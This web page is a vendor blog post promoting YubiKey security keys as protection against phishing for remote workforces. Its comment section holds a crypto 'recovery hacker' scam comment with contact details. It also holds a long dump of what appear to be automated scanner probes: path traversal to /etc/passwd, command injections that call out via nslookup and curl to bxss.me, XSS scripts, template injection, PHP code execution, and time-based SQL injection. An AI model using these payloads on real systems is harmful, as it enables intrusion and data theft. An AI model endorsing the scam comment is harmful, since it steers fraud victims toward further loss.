How does Yubikey Protect your Remote Workforce from Phishing?


With the ongoing COVID-19 pandemic comes a need to adapt to the new normal, and this includes setting up a remote workforce to allow businesses to continue operations.

 

What Is a Remote Workforce?

 

A remote workforce is a flexible work arrangement that allows employees within an organization to perform their tasks and responsibilities outside a traditional office space. This kind of work setup, which commonly refers to a work-from-home (WFH) setup, has become increasingly popular because of the COVID-19 pandemic that restricted outside activities due to health and safety reasons.

 

Through this work arrangement, employees experience advantages, including less time on the road, reduced costs and better work-life balance. In return, companies have also benefited with increased productivity, higher employee satisfaction and cost saving in office resources.

 

As time progresses and as every country slowly recovers from the pandemic, there are some companies that are reverting back to the traditional office setup, while others have embraced the concept of the remote workforce and all the benefits it provides.

 

Concept of Remote Work for Modern Businesses

 

In order to have a successful remote workforce, a company must have a good

combination of technology, work processes and corporate ethos that are tailored to spur the

overall performance of their employees despite working outside the office.  Since work from

home has just recently entered popular conversation, there are still ongoing discussions

on what are the components that make a successful work-from-home arrangement.  These include:

 

  • Strong and stable Internet connection - Working from home requires fast Internet connection that allows every team member to communicate effectively and share their files and other work outputs harmoniously.            

 

  • Tools and other software - Despite working in different locations, companies

and employees must utilize software and other technological tools that can serve as a

platform for communication, file sharing, remote desktops, and other business and work transactions.

 

  • Organizational ethos - For a WFH setup to succeed, it should be a two way-street.  The company should trust their employees that they are doing their tasks despite their location and the absence of someone who will supervise them physically. They must also provide the necessary working tools for their employees. On the other hand, employees should ensure their company that they are performing their responsibility and can manage to deliver excellent and quality performance even if they are working remotely.

 

What Technology Is Needed for a Remote Workforce?

 

Technology is the bloodline that makes a remote workforce successful and

productive. These technological tools must be available to aid those employees who are

working outside so that they can perform their tasks as if they are still inside their office.

Examples of these technologies are:

 

  • Video Calling - Face-to- face meetings, one-on-one discussions and group conferences are some of the fundamental things that a traditional office set-up can provide.  With a WFH setup, these physical gatherings are replaced with virtual meetings via platforms that allow video meetings and conferences to continue despite disparities in location and distances.

 

  • Instant Messaging - Employees can take their time drafting tedious messages through emails, but with the help of instant and easy-to-navigate messaging tools and apps, communication with your co-workers is  a walk in the park. These tools allow direct messages and group chats where information is relayed immediately.

 

  • Project Management Platform - Consolidating your company’s projects or daily tasks in one management platform allows employees to have a single place where they can see and check the progress of each project and the specific tasks that they needed to do. This platform saves time by reducing the need to message and conduct video meetings.

 

What Are the Risks of Remote Work?

 

Remote work has provided benefits and advantageous situations to both companies and employees, but it also has some disadvantages and risks. Some of these risks are:

 

  • Employee Management - There are managers who are not used to supervising employees remotely. These managers are worried that they won’t be able to prod their employees to work and perform their tasks. They also face new challenges such as making new employees feel like they belong, or how to better communicate with all employees on a professional and personal level.

 

  • Data Privacy - Since employees are working remotely, accessing the company’s data might put them in peril since they are using personal devices and the public Internet. That is why there is a need to secure and protect these devices in order also to protect the private and sensitive data of their company. This kind of remote problem can be solved by using encryption and other protection tools that can safeguard data on public networks and hackers.

 

  • Phishing - Another risk of having a remote workforce is the susceptibility to phishing.  Due to precarious internet connection and unsafe devices, hackers can pretend to be a trusted employee or part of the company who  will send email or any form of messages that contain malicious links to other employees. These links once clicked can lead to installation of malware  

 

How Yubikey Protects Employees from Phishing and Beyond

 

Enable MFA for identity access management (IAM) systems and identity providers (IdPs)

The Yubikey 5 Series and FIPS- validated Yubikey Series is an easy-to-use, durable and multi-function solution that employees can use across multiple and different devices, operating systems and locations. It enables multi-factor authentication (MFA) that allows employees to work without the struggles of remembering multiple usernames and passwords.

 

Secure VPN Access with MFA

Yubikey can be configured with leading VPNs such as Pulse Secure and Cisco AnyConnect as a smartcard (PIV) for remote access.  There are also other VPNs that offer native support for Yubikeys to use one-time password (OTP) capabilities.

 

MFA for Computer Login

Yubikey can be used to secure computer login whether you are using a Mac or a Windows system. This is due to the smartcard functionality of Yubikey and the key in addition to a PIN to lock down access to a computer. Yubico has been working recently with Microsoft to enable native Yubikey support in Microsoft Azure Active Directory for a FIDO-based passwordless login experience.

 

Step Up Authentication for Password Managers

Yubikey can be integrated with several enterprise-grade password managers, including 1Password, Dashlane, Keeper Security and LastPass. This will enable employers to have a simple and safe way in creating, storing and managing passwords. It will also remove the old-age practice where employees manage their passwords by writing it down on sticky notes or using human memory that sometimes can’t be reliable.

 

Use a YubiKey to Generate One-time Time-based Passcodes

Yubikey allows users to generate the OTP codes within the app by inserting or tapping the Yubikey to a device instead of the one-time passcodes that are being stored within a mobile device or a computer. This authenticator is compatible with iOS, Android, PC and Mac.

 

Take away

The WFH setup is now the new normal. With its myriad of benefits, there are some companies and employees who are considering this to become their permanent work arrangement. Yet like many other things, it also comes with disadvantages and perils. One prominent example is the invasion of a company’s private data. The severity of this problem has increased due to the large numbers of employees who are using unsecured devices and public internet connection. But like every problem, there always comes a solution. And that’s where Yubico and Yubikeys come to the rescue.

 

Giving the employees the chance to experience work remotely or from home should not be hampered nor affected by  unforeseen risks such as phishing and other hacking practices. That is why Yubico  guarantees both the company and its employees  that they are protected  through their trusted digital securities that include Security Key NFCYubiKey 5 NFCYubiKey 5CiYubiKey 5C NFCYubiKey 5 Nano, and YubiKey Bio

 

Want to avail Yubico products? Contact +63 2 8858 5555 today!

 

 

 

Leave your comment
Comments
11/19/2023 10:45 PM
HAVE YOU BEEN RIPPED OF YOUR COINS.

Have you gotten your bitcoins stolen from your wallet or invested in an ICO that turned out to be a scam, you are not alone because this happened to me too. I initially lost $96,000 in just less then five months from Fake investment scam company. My friend referred me to a hacker who helped me recover all my funds within 3 days. I’m speaking up to improve awareness of these cryptocurrency thieves and help as much as i can to reduce victims to the minimum. If you have been a victim, Simply contact Them ( MorrisGray380 at Gmail Dot Com  )or whatsapp ( +1 607 698 0239 )......
3/28/2024 7:17 AM
<esi:include src="http://bxss.me/rpb.png"/>
3/28/2024 7:17 AM
${9999399+10000132}
3/28/2024 7:17 AM
)
3/28/2024 7:17 AM
!(()&&!|*|*|
3/28/2024 7:17 AM
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
3/28/2024 7:17 AM
^(#$!@#$)(()))******
3/28/2024 7:17 AM
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
3/28/2024 7:17 AM
Http://bxss.me/t/fit.txt
3/28/2024 7:17 AM
../../../../../../../../../../../../../../etc/passwd
3/28/2024 7:18 AM
http://bxss.me/t/fit.txt?.jpg
3/28/2024 7:18 AM
../../../../../../../../../../../../../../windows/win.ini
3/28/2024 7:18 AM
/etc/shells
3/28/2024 7:18 AM
file:///etc/passwd
3/28/2024 7:18 AM
c:/windows/win.ini
3/28/2024 7:18 AM
/../../../../../../../../../../windows/system32/BITSADMIN.exe
3/28/2024 7:18 AM
bxss.me
3/28/2024 7:18 AM
../
3/28/2024 7:18 AM
./
3/28/2024 7:18 AM
response.write(9827698*9075853)
3/28/2024 7:18 AM
'+response.write(9827698*9075853)+'
3/28/2024 7:18 AM
"+response.write(9827698*9075853)+"
3/28/2024 7:18 AM
echo kzjtdq$()\ pwetfw\nz^xyu||a #' &echo kzjtdq$()\ pwetfw\nz^xyu||a #|" &echo kzjtdq$()\ pwetfw\nz^xyu||a #
3/28/2024 7:18 AM
12345'"\'\");|]*{
<>�''💡
3/28/2024 7:18 AM
&echo tfgoli$()\ kobftw\nz^xyu||a #' &echo tfgoli$()\ kobftw\nz^xyu||a #|" &echo tfgoli$()\ kobftw\nz^xyu||a #
3/28/2024 7:18 AM
|echo xeuyai$()\ icocdg\nz^xyu||a #' |echo xeuyai$()\ icocdg\nz^xyu||a #|" |echo xeuyai$()\ icocdg\nz^xyu||a #
3/28/2024 7:18 AM
(nslookup -q=cname hitebllcayfmj1467f.bxss.me||curl hitebllcayfmj1467f.bxss.me))
3/28/2024 7:18 AM
$(nslookup -q=cname hitnylaxyfdhk22c11.bxss.me||curl hitnylaxyfdhk22c11.bxss.me)
3/28/2024 7:18 AM
&nslookup -q=cname hitfayrhigwko960d3.bxss.me&'\"`0&nslookup -q=cname hitfayrhigwko960d3.bxss.me&`'
3/28/2024 7:18 AM
HttP://bxss.me/t/xss.html?%00
3/28/2024 7:18 AM
bxss.me/t/xss.html?%00
3/28/2024 7:18 AM
&(nslookup -q=cname hitxdyjnnwllw618d0.bxss.me||curl hitxdyjnnwllw618d0.bxss.me)&'\"`0&(nslookup -q=cname hitxdyjnnwllw618d0.bxss.me||curl hitxdyjnnwllw618d0.bxss.me)&`'
3/28/2024 7:18 AM
|(nslookup -q=cname hituofkulmhhz9422d.bxss.me||curl hituofkulmhhz9422d.bxss.me)
3/28/2024 7:18 AM
`(nslookup -q=cname hitoumhvexxpv6a091.bxss.me||curl hitoumhvexxpv6a091.bxss.me)`
3/28/2024 7:18 AM
xfs.bxss.me
3/28/2024 7:18 AM
;(nslookup -q=cname hitpftcqgvyag6a694.bxss.me||curl hitpftcqgvyag6a694.bxss.me)|(nslookup -q=cname hitpftcqgvyag6a694.bxss.me||curl hitpftcqgvyag6a694.bxss.me)&(nslookup -q=cname hitpftcqgvyag6a694.bxss.me||curl hitpftcqgvyag6a694.bxss.me)
3/28/2024 7:18 AM
ArticleCommentAdd
3/28/2024 7:18 AM
ArticleCommentAdd
3/28/2024 7:18 AM
ArticleCommentAdd/.
3/28/2024 7:18 AM
"+"A".concat(70-3).concat(22*4).concat(102).concat(78).concat(116).concat(67)+(require"socket"
Socket.gethostbyname("hitcf"+"pbivqhvn76a26.bxss.me.")[3].to_s)+"
3/28/2024 7:18 AM
'"
3/28/2024 7:18 AM
'+'A'.concat(70-3).concat(22*4).concat(120).concat(82).concat(106).concat(74)+(require'socket'
Socket.gethostbyname('hitoz'+'xxqifjdy67ae8.bxss.me.')[3].to_s)+'
3/28/2024 7:18 AM
<!--
3/28/2024 7:18 AM
ctime
sleep
p0
(I30
tp1
Rp2
.
3/28/2024 7:18 AM
'.gethostbyname(lc('hitnr'.'jfueuayc22b9a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(68).chr(112).chr(83).'
3/28/2024 7:18 AM
".gethostbyname(lc("hitmb"."yfegwlip34d94.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(71).chr(99).chr(76)."
3/28/2024 7:18 AM
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
3/28/2024 7:18 AM
'"()&%<zzz><ScRiPt >CcLj(9433)</ScRiPt>
3/28/2024 7:18 AM
';print(md5(31337));$a='
3/28/2024 7:18 AM
";print(md5(31337));$a="
3/28/2024 7:18 AM
${@print(md5(31337))}
3/28/2024 7:18 AM
'"()&%<zzz><ScRiPt >CcLj(9102)</ScRiPt>
3/28/2024 7:18 AM
'"()
3/28/2024 7:18 AM
${@print(md5(31337))}\
3/28/2024 7:18 AM
'&&sleep(27*1000)*zkuclm&&'
3/28/2024 7:18 AM
'.print(md5(31337)).'
3/28/2024 7:18 AM
"&&sleep(27*1000)*jkavkd&&"
3/28/2024 7:18 AM
9422865
3/28/2024 7:18 AM
'||sleep(27*1000)*oenoxk||'
3/28/2024 7:18 AM
"||sleep(27*1000)*upeupu||"
3/28/2024 7:18 AM
bfg5918<s1﹥s2ʺs3ʹhjl5918
3/28/2024 7:18 AM
bfgx8861��z1��z2a�bcxhjl8861
3/28/2024 7:18 AM
<%={{={@{#{${dfb}}%>
3/28/2024 7:18 AM
<th:t="${dfb}#foreach
3/28/2024 7:18 AM
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
3/28/2024 7:18 AM
dfb{{98991*97996}}xca
3/28/2024 7:18 AM
dfb[[${98991*97996}]]xca
3/28/2024 7:18 AM
dfb__${98991*97996}__::.x
3/28/2024 7:19 AM
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
3/28/2024 7:19 AM
<ScRiPt >CcLj(9125)</ScRiPt>
3/28/2024 7:19 AM
<WEMZT9>MFX9Q[!+!]</WEMZT9>
3/28/2024 7:19 AM
<script>CcLj(9625)</script>
3/28/2024 7:19 AM
<script>CcLj(9133)</script>9133
3/28/2024 7:19 AM
<ScR<ScRiPt>IpT>CcLj(9760)</sCr<ScRiPt>IpT>
3/28/2024 7:19 AM
<ScRiPt
>CcLj(9265)</ScRiPt>
3/28/2024 7:19 AM
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9464></ScRiPt>
3/28/2024 7:19 AM
<ScRiPt
>CcLj(9356)</ScRiPt>
3/28/2024 7:19 AM
<svg  

�onload=CcLj(9349);>
3/28/2024 7:19 AM
<isindex type=image src=1 onerror=CcLj(9856)>
3/28/2024 7:19 AM
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9816'>
3/28/2024 7:19 AM
<body onload=CcLj(9208)>
3/28/2024 7:19 AM
<img src=//xss.bxss.me/t/dot.gif onload=CcLj(9926)>
3/28/2024 7:19 AM
<img src=xyz OnErRor=CcLj(9305)>
3/28/2024 7:19 AM
<img/src=">" onerror=alert(9270)>
3/28/2024 7:19 AM
%0D%0A%3C%53%63%52%69%50%74%20%3E%43%63%4C%6A%289086%29%3C%2F%73%43%72%69%70%54%3E
3/28/2024 7:19 AM
\u003CScRiPt\CcLj(9391)\u003C/sCripT\u003E
3/28/2024 7:19 AM
&lt;ScRiPt&gt;CcLj(9085)&lt;/sCripT&gt;
3/28/2024 7:19 AM
�<img zzz onmouseover=CcLj(94311) //�>
3/28/2024 7:19 AM
<input autofocus onfocus=CcLj(9691)>
3/28/2024 7:19 AM
<a HrEF=http://xss.bxss.me></a>
3/28/2024 7:19 AM
<a HrEF=jaVaScRiPT:>
3/28/2024 7:19 AM
}body{zzz:Expre/**/SSion(CcLj(9183))}
3/28/2024 7:19 AM
hXdbP
<ScRiPt >CcLj(9099)</ScRiPt>
3/28/2024 7:19 AM
<W7MSVB>GJ0AZ[!+!]</W7MSVB>
3/28/2024 7:20 AM
<ifRAme sRc=9540.com></IfRamE>
3/28/2024 7:20 AM
<aCMVJAw x=9287>
3/28/2024 7:20 AM
<img sRc='http://attacker-9129/log.php?
3/28/2024 7:20 AM
<a6WRlEj<
3/28/2024 7:25 AM
vbNYsfmH
3/28/2024 7:25 AM
-1 OR 2+310-310-1=0+0+0+1 --
3/28/2024 7:25 AM
-1 OR 3+310-310-1=0+0+0+1 --
3/28/2024 7:25 AM
-1 OR 2+489-489-1=0+0+0+1
3/28/2024 7:25 AM
-1 OR 3+489-489-1=0+0+0+1
3/28/2024 7:25 AM
-1' OR 2+586-586-1=0+0+0+1 --
3/28/2024 7:25 AM
-1' OR 3+586-586-1=0+0+0+1 --
3/28/2024 7:25 AM
-1' OR 2+133-133-1=0+0+0+1 or 'DEb71tLR'='
3/28/2024 7:25 AM
-1' OR 3+133-133-1=0+0+0+1 or 'DEb71tLR'='
3/28/2024 7:25 AM
-1" OR 2+27-27-1=0+0+0+1 --
3/28/2024 7:25 AM
-1" OR 3+27-27-1=0+0+0+1 --
3/28/2024 7:27 AM
*if(now()=sysdate(),sleep(15),0)
3/28/2024 7:27 AM
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
3/28/2024 7:27 AM
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
3/28/2024 7:27 AM
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
3/28/2024 7:27 AM
-1; waitfor delay '0:0:15' --
3/28/2024 7:28 AM
-1); waitfor delay '0:0:15' --
3/28/2024 7:29 AM
-1)); waitfor delay '0:0:15' --
3/28/2024 7:30 AM
-1 waitfor delay '0:0:15' --
3/28/2024 7:37 AM
tg3fr9jG'; waitfor delay '0:0:15' --
3/28/2024 7:38 AM
jUshvMqi'); waitfor delay '0:0:15' --
3/28/2024 7:39 AM
hgSwSKAu')); waitfor delay '0:0:15' --
3/28/2024 7:40 AM
-1 OR 195=(SELECT 195 FROM PG_SLEEP(15))--
3/28/2024 7:41 AM
-1) OR 917=(SELECT 917 FROM PG_SLEEP(15))--
3/28/2024 7:42 AM
-1)) OR 357=(SELECT 357 FROM PG_SLEEP(15))--
3/28/2024 7:43 AM
gefl8zxC' OR 58=(SELECT 58 FROM PG_SLEEP(15))--
3/28/2024 7:44 AM
qE2mnyk8') OR 68=(SELECT 68 FROM PG_SLEEP(15))--
3/28/2024 7:45 AM
iCugh8Wb')) OR 690=(SELECT 690 FROM PG_SLEEP(15))--
3/28/2024 7:46 AM
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
3/28/2024 7:48 AM
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
3/28/2024 7:48 AM
'"
3/28/2024 7:48 AM
����%2527%2522\'\"
3/28/2024 7:48 AM
@@SJS0Z